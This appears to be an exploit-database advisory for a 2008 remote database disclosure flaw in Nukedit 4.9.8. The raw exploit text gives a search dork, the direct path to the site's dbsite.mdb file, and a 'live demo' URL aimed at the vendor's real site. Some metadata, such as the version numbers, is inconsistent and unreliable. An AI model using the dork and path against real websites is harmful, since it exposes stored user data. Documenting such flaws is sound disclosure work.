Nukedit 4.9.8 Remote Database Disclosure Vulnerability

vendor:

Nukedit

by:

Cyber.Zer0

7.5

CVSS

HIGH

Database Disclosure

200

CWE

Product Name: Nukedit

Affected Version From: 4.9.2008

Affected Version To: 4.9.2008

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Nukedit 4.9.8 Remote Database Disclosure Vulnerability

Nukedit 4.9.8 is vulnerable to a remote database disclosure vulnerability. An attacker can access the database file (dbsite.mdb) by sending a request to the /database/dbsite.mdb path. This can lead to the disclosure of sensitive information stored in the database.

Mitigation:

Upgrade to the latest version of Nukedit 4.9.8 or later.

Source

Exploit-DB raw data:

###########################################################
#Title:       Nukedit 4.9.8 Remote Database Disclosure Vulnerability
#Credit:      Cyber.Zer0          
#             Cyber.Zer0[4t]Hotmail[dot]com                                                                                           
#Download:    http://www.nukedit.com/content/Download.asp      
#Remote:      Yes                                         
#Dork:        "Powered by Nukedit"                                            
############################################
--=[Database Disclosure]=--
http://target.com/database/dbsite.mdb


Live Demo

http://www.nukedit.com/database/dbsite.mdb

# milw0rm.com [2008-12-16]